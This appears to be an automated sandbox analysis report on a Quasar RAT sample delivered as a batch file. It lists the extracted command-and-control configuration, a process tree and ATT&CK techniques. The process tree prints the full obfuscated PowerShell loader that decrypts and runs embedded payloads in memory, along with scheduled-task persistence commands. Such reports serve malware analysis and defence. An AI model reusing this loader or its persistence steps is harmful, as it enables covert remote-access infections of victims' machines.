Resubmissions

21-04-2024 01:41

240421-b4jlgsga9w 10

21-04-2024 01:20

240421-bqc7jsfc53 10

Analysis

  • max time kernel
    35s
  • max time network
    36s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-04-2024 01:20

General

  • Target

    Uni.bat

  • Size

    1.8MB

  • MD5

    14516087f9549022d5582272910428b1

  • SHA1

    53324370839fa1c07bfa42cf7cb3039513805d42

  • SHA256

    745517dc1c6f989b9882959b31d34621c3a25dde79054f29ff6d7539a603ea3e

  • SHA512

    cda051bfe205763fe10c9b6970e3b56c4a6044d42d30c8f5ff1b722318c3b69aa1e86c898f4cb70d6e9c4846db8701e7c85b31c4356bf88ca1a8915bb2e0250f

  • SSDEEP

    24576:Kn1j2//LtzVBqLoCQw/376Fx2S6aryOdijwog7h66zQIG9GcQ0clANNPny:KdMW+wf+UAwIvczy

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

SLAVE

C2

uk2.localto.net:39077

Mutex

cc0a2b76-665e-4e16-b318-5ee02270fbcd

Attributes
  • encryption_key

    D7F09F1F0B9CECC640BA0B3D8975FBE5CED725B5

  • install_name

    UpdateHost.exe

  • log_directory

    Error Logs

  • reconnect_delay

    3000

  • startup_key

    WOS64

  • subdirectory

    Windows

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2028
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uJuitVGk2ro0N3Dl271h/Nt65v72klQHrojzsETrplQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qR1c+BKza1ywPSpxU3Z8Bw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pjeaJ=New-Object System.IO.MemoryStream(,$param_var); $sIcuP=New-Object System.IO.MemoryStream; $RYqCQ=New-Object System.IO.Compression.GZipStream($pjeaJ, [IO.Compression.CompressionMode]::Decompress); $RYqCQ.CopyTo($sIcuP); $RYqCQ.Dispose(); $pjeaJ.Dispose(); $sIcuP.Dispose(); $sIcuP.ToArray();}function execute_function($param_var,$param2_var){ $fRWeF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uxOtv=$fRWeF.EntryPoint; $uxOtv.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$gcCqD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($wdeYw in $gcCqD) { if ($wdeYw.StartsWith(':: ')) { $YNizn=$wdeYw.Substring(3); break; }}$payloads_var=[string[]]$YNizn.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4780
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_539_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_539.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4496
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_539.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:2884
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_539.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2060
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uJuitVGk2ro0N3Dl271h/Nt65v72klQHrojzsETrplQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qR1c+BKza1ywPSpxU3Z8Bw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pjeaJ=New-Object System.IO.MemoryStream(,$param_var); $sIcuP=New-Object System.IO.MemoryStream; $RYqCQ=New-Object System.IO.Compression.GZipStream($pjeaJ, [IO.Compression.CompressionMode]::Decompress); $RYqCQ.CopyTo($sIcuP); $RYqCQ.Dispose(); $pjeaJ.Dispose(); $sIcuP.Dispose(); $sIcuP.ToArray();}function execute_function($param_var,$param2_var){ $fRWeF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uxOtv=$fRWeF.EntryPoint; $uxOtv.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_539.bat';$gcCqD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_539.bat').Split([Environment]::NewLine);foreach ($wdeYw in $gcCqD) { if ($wdeYw.StartsWith(':: ')) { $YNizn=$wdeYw.Substring(3); break; }}$payloads_var=[string[]]$YNizn.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4960
            • C:\Windows\SYSTEM32\schtasks.exe
              "schtasks" /create /tn "WOS64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exe" /rl HIGHEST /f
              6⤵
              • Creates scheduled task(s)
              PID:3368
            • C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exe
              "C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              PID:764

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Scheduled Task/Job

1
T1053

Persistence

Scheduled Task/Job

1
T1053

Privilege Escalation

Scheduled Task/Job

1
T1053

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    3KB

    MD5

    661739d384d9dfd807a089721202900b

    SHA1

    5b2c5d6a7122b4ce849dc98e79a7713038feac55

    SHA256

    70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

    SHA512

    81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    4d2c8d8bf93f9450f044c6ef5dff215a

    SHA1

    4d6ecc646ee6c124aaf7535c1387445e02734750

    SHA256

    e77daf5c774ba87a166ccd95c40a7211f605316321e1d421b82fb0fc8ed75eb0

    SHA512

    c75903513f87ba5fb4da3e19b079be8ba1f451e1f503ed9fdcf3dee82ce9605b87af560a120156a09b3842cdf0c42fb20f7c8cd242e3021d644e959c8536c0aa

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w0cqajya.fyu.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exe
    Filesize

    442KB

    MD5

    04029e121a0cfa5991749937dd22a1d9

    SHA1

    f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

    SHA256

    9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

    SHA512

    6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

  • C:\Users\Admin\AppData\Roaming\startup_str_539.bat
    Filesize

    1.8MB

    MD5

    14516087f9549022d5582272910428b1

    SHA1

    53324370839fa1c07bfa42cf7cb3039513805d42

    SHA256

    745517dc1c6f989b9882959b31d34621c3a25dde79054f29ff6d7539a603ea3e

    SHA512

    cda051bfe205763fe10c9b6970e3b56c4a6044d42d30c8f5ff1b722318c3b69aa1e86c898f4cb70d6e9c4846db8701e7c85b31c4356bf88ca1a8915bb2e0250f

  • C:\Users\Admin\AppData\Roaming\startup_str_539.vbs
    Filesize

    115B

    MD5

    335912c92f960bed6de5a2807d0c06e8

    SHA1

    0fc47a61e5ebaf37a0d9b147811b7fcf3f6bdfb5

    SHA256

    fff158e9c023a9497f4d3379766720928d815cdf3bf48ea947f51d9db3c8f6ea

    SHA512

    f0b7cf73a094d5765431e18ae71d5084d62aa392676342a3b197e98297f43c8ffa3a086406b568eda5cf3b4864fd192253602fc0baa9153599beb99252b657a6

  • memory/764-76-0x00007FF976AA0000-0x00007FF977561000-memory.dmp
    Filesize

    10.8MB

  • memory/764-71-0x0000020E9E1D0000-0x0000020E9E1E0000-memory.dmp
    Filesize

    64KB

  • memory/764-70-0x00007FF976AA0000-0x00007FF977561000-memory.dmp
    Filesize

    10.8MB

  • memory/764-72-0x0000020EA0390000-0x0000020EA03D4000-memory.dmp
    Filesize

    272KB

  • memory/764-73-0x0000020EA06B0000-0x0000020EA0726000-memory.dmp
    Filesize

    472KB

  • memory/764-77-0x0000020E9E1D0000-0x0000020E9E1E0000-memory.dmp
    Filesize

    64KB

  • memory/764-78-0x0000020E9E1D0000-0x0000020E9E1E0000-memory.dmp
    Filesize

    64KB

  • memory/4496-16-0x00007FF976AA0000-0x00007FF977561000-memory.dmp
    Filesize

    10.8MB

  • memory/4496-27-0x000002257E830000-0x000002257E840000-memory.dmp
    Filesize

    64KB

  • memory/4496-28-0x000002257E830000-0x000002257E840000-memory.dmp
    Filesize

    64KB

  • memory/4496-31-0x00007FF976AA0000-0x00007FF977561000-memory.dmp
    Filesize

    10.8MB

  • memory/4496-17-0x000002257E830000-0x000002257E840000-memory.dmp
    Filesize

    64KB

  • memory/4780-12-0x000002AFEAD10000-0x000002AFEAD20000-memory.dmp
    Filesize

    64KB

  • memory/4780-53-0x00007FF976AA0000-0x00007FF977561000-memory.dmp
    Filesize

    10.8MB

  • memory/4780-14-0x000002AFED280000-0x000002AFED3D8000-memory.dmp
    Filesize

    1.3MB

  • memory/4780-13-0x000002AFED040000-0x000002AFED048000-memory.dmp
    Filesize

    32KB

  • memory/4780-11-0x000002AFEAD10000-0x000002AFEAD20000-memory.dmp
    Filesize

    64KB

  • memory/4780-10-0x00007FF976AA0000-0x00007FF977561000-memory.dmp
    Filesize

    10.8MB

  • memory/4780-5-0x000002AFED050000-0x000002AFED072000-memory.dmp
    Filesize

    136KB

  • memory/4960-54-0x00000257BB840000-0x00000257BBB64000-memory.dmp
    Filesize

    3.1MB

  • memory/4960-55-0x00000257B92C0000-0x00000257B92D0000-memory.dmp
    Filesize

    64KB

  • memory/4960-51-0x00000257B92C0000-0x00000257B92D0000-memory.dmp
    Filesize

    64KB

  • memory/4960-50-0x00000257B92C0000-0x00000257B92D0000-memory.dmp
    Filesize

    64KB

  • memory/4960-46-0x00007FF976AA0000-0x00007FF977561000-memory.dmp
    Filesize

    10.8MB

  • memory/4960-74-0x00007FF976AA0000-0x00007FF977561000-memory.dmp
    Filesize

    10.8MB